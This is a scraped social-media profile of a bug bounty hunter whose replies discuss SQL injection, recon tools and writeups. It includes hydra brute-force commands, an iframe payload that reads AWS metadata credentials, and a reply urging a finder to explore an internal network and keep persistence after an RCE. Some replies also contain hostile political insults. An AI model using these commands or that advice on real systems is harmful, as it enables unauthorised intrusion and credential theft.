Usef Profile
Usef

@bug4you

Followers
1,561
Following
483
Media
3
Statuses
141

Believe you can and you're halfway there!

127.0.0.1:8989
Joined April 2023
@bug4you
Usef
8 months
@rahuman_hamdi Pentester land Medium Hacker101 Hacktivity And I suggest reading those blogs of Corben & Sam @hacker_ : @samwcyo : Those two blogs will take you to the next level.
1
6
20
@bug4you
Usef
6 months
3
5
15
@bug4you
Usef
8 months
@PoundXI I like testing 2 targets at one time, and testing all bug types, and gonna share the methodology in the writeup Monday :)
0
0
7
@bug4you
Usef
8 months
@jancuuckkk Hey mate, DM me if you are serious and wanna collab on this, and I’m not king, still learning every day 😏, and really hoped to give things back to the community I learnt from, and this is the result I took? Thanks 😏
0
1
7
@bug4you
Usef
5 months
@0x_rood @jobertabma @Hacker0x01 Fair enough, but the guy said ATO, what do you think?
2
0
6
@bug4you
Usef
8 months
@ayadiX01 I will share everything in detail with my mindset thoughts in the writeup bro, just be patient. This will be my first writeup ever and I really need to give back to the community I learnt from, just waiting for it to be resolved, then I’ll disclose the ideas!
1
0
5
@bug4you
Usef
8 months
@MianQas52573653 Yeah, httpx, aquatone, waybackurls
1
0
4
@bug4you
Usef
6 months
@IdoNaor1 hey dude, where's your proof of enjoying taking part in humans, indeed the Israeli Forces enjoy doing this shit, Muslims just want and fight for the land, and you are tweeting shits without any proof, If you need proof of that, I'm tryna DM you with a British telegram Chann...
0
0
4
@bug4you
Usef
5 months
@Ox4d5a After 1 hour of installation:
Tweet media one
0
0
4
@bug4you
Usef
5 months
@AhmadZeindin They need a security issue on their assets, if you got this through IDOR or other vulnerability, they will consider ur report as a security issue and the fix will be implemented, but if you just got leaked PII Info from the past so what do you expect them to do? Pay you?
1
0
2
@bug4you
Usef
7 months
@M7moud_mk99 Congrats Mashallah! ❤️
0
0
3
@bug4you
Usef
7 months
@Lippy_Larry Of course buddy you will see the hostages again in ur dreams!
0
0
2
@bug4you
Usef
9 months
@SirBagoza The date indicates that it’s an old .git directory bro, were u able to get something sensitive from it? Is it accepted from you as a valid bug?
1
0
3
@bug4you
Usef
7 months
@Reachded Let’s agree that you are an idiot and talking shit without answer my question, didn’t you? I don’t have time for idiots tbh, I invest my time in praying learning gym, block me plz 😆
1
0
3
@bug4you
Usef
8 months
@fack02011928 When u are using Burp Suite and the FoxyProxy extension for example, all the requests pass to ur Burp history and intercept tab, and there are lots of annoying requests related to some APIs like Google and TikTok and Facebook, for sure you don’t wanna see them, so yeah this filters it.
1
0
2
@bug4you
Usef
8 months
@AyushSingh1098 Thanks for the kind words, hope to give something to the community I learnt from! 😅
0
0
2
@bug4you
Usef
8 months
@SirBagoza Thanks Fares really appreciate your feedback and support man! 😅
0
0
2
@bug4you
Usef
8 months
@0x_rood Yeah, it’s kinda tough, but my hats off to you man in RXSS and Logic Vulnerabilities. 😍🎩
0
0
2
@bug4you
Usef
8 months
@7O66_ Nah, tbh straightforward, no WAF detected, most of them are not sanitized with prepared statements at the backend.
0
0
2
@bug4you
Usef
7 months
@Reachded Let’s make it simple for you, what would you do if someone killed ur family and take your land? I think your thoughts tell me now that you will raise the peace flag and be a kind person with him right? For me I will chase him until the last breath in my body😊 Do your search more
1
0
2
@bug4you
Usef
6 months
@nahuelrm_ Insane, congratulations dude! 🔥
0
0
2
@bug4you
Usef
7 months
@M7moud_mk99 sudo hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.230.23 http-get /test/admin.php/
-f ====> to exit after you find the first correct password.
/test/admin.php/ ====> This is the subdirectory in the website that has the login panel.
1
0
1
@bug4you
Usef
8 months
@Shari7a0X Private.
0
0
1
@bug4you
Usef
8 months
@being__aman Thx man! 😅
0
0
1
@bug4you
Usef
7 months
@M7moud_mk99 SSH: hydra -l user -P rockyou.txt 10.10.10.10 ssh -v
FTP: hydra -l user -P rockyou.txt ftp://10.10.10.10 -v
The switches (l & p): for both of them you can use the lowercase character to provide a single string, and the uppercase character to provide a list to brute force with.
1
0
1
@bug4you
Usef
8 months
@AbdulRa11538162 It depends, does it give you 200 OK with the same response body & response length when injecting two single quotes? DM me with the domain bro, we can collaborate :)
1
0
1
@bug4you
Usef
7 months
@0xTib3rius In my perspective I think that the packaged courses will be a good choice for beginners cuz the course will be packaged effectively based on the instructor’s experience, but I don’t think it’s gonna be a good choice or really worth it when it comes to an advanced level :)
0
0
1
@bug4you
Usef
7 months
@M7moud_mk99 My bad, hashcat is the best one for cracking hashes, especially SHA-512, however, hydra is good at SSH & FTP if you tryna brute force the login process.
1
0
1
@bug4you
Usef
9 months
@0x_rood Nice Catch my friend
1) After pasting the successful JSON body response in the wrong response, when you refresh the browser, are you still taking over that account?
2) Are there any parameters that identify the user or something that gives you the ability to take anyone’s account?
0
0
1
@bug4you
Usef
8 months
@ayadiX01 No sorry bro in my question I meant the matcher section in burp suite!
0
0
1
@bug4you
Usef
7 months
@Jayesh25_ Hey Jayesh, do you have some secrets on web cache poisoning & JWT attacks ?
1
0
1
@bug4you
Usef
8 months
@gh0st0210 Thanks man, Really love those words! 😅❤️
1
0
1
@bug4you
Usef
8 months
@MianQas52573653 Manually, wait for writeup if you don’t know how sqlmap works and how it fetches the column numbers, and number of databases, and dumping the version and tables etc…
1
0
0
@bug4you
Usef
8 months
@ayadiX01 Time based and Boolean based, and one of them raised an error containing sensitive data, but it landed up time based not error based with me at the exploitation phase, couldn’t differentiate any errors since the same error was always returned even when changing the injected SQL payload
1
0
1
@bug4you
Usef
7 months
@M7moud_mk99 until it finds the correct creds. Also, keep in mind that (user & pass) are the parameter names in your POST request, and ^USER^ & ^PASS^ are variables that Hydra uses to brute force and put in the words that come from the wordlist that you provided. 2)
1
0
1
@bug4you
Usef
6 months
@0x0asif
0x0Asif🇧🇩
6 months
@Jayesh25_ after pdf export, If you see HTML injection works there. Must try: <iframe src=" http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-service-role-ssm-codedeploy"> Thanks.
2
10
58
1
0
1
@bug4you
Usef
8 months
@xalgord Thanks bro! 🥰 I will disclose Writeup Tomorrow! ❤️👍🏼
0
0
1
@bug4you
Usef
8 months
@Yaseen11211 Nope, in most cases all you need is to bypass the WAF or firewall rules, if you are able to do so you will be at a position of 90% your crafted payload would work at any parameter that is not sanitized properly on the same target, or even at the User-Agent header injection!
0
0
1
@bug4you
Usef
8 months
@a7mad__n1 Sounds great, keep it up Ahmed <3
1
0
1
@bug4you
Usef
7 months
@hasanthehun Well done dear Hassan Wallahy. ❤️ Many Thanks to everyone denoting one cent!
0
0
0
@bug4you
Usef
7 months
@M7moud_mk99 sudo hydra -l admin -P rockyou.txt 10.10.7.228 http-post-form "/test/admin.php:user=^USER^&pass=^PASS^:F=Username or password invalid" -V
The statement "Username or password invalid" is kind of a flag to Hydra to know that this is an invalid response, and keep brute-forcing until 1)
1
0
1
@bug4you
Usef
11 months
@z3r01k Mashallah Amazing brother, waiting for Writeup I’m focusing on sqli too. ❤️
1
0
1
@bug4you
Usef
8 months
@_2os5 The SELECT query will be a valid query and will return 1 when the database starts with the (k) or (i) character, and then since we are doing: AND (SELECT QUERY)=1, the condition will be true and there will be no error and the server will return the audio file in response.
1
0
0
@bug4you
Usef
8 months
@koantinometa @abdlah_md @Microsoft Why didn’t you take action and explore the network? Could be there’s some internal IPs with you on the same subnet man, and the most important part, are you persisted on the device till now or what? Ping me if you wanna collab on it if the RCE is still working.
0
0
1
@bug4you
Usef
8 months
@rahuman_hamdi @hacker_ @samwcyo I'm talking in general here about the places where I prefer to read writeups as you asked, not about SQLI.
0
0
1
@bug4you
Usef
9 months
@aufzayed <3 CORS
0
0
1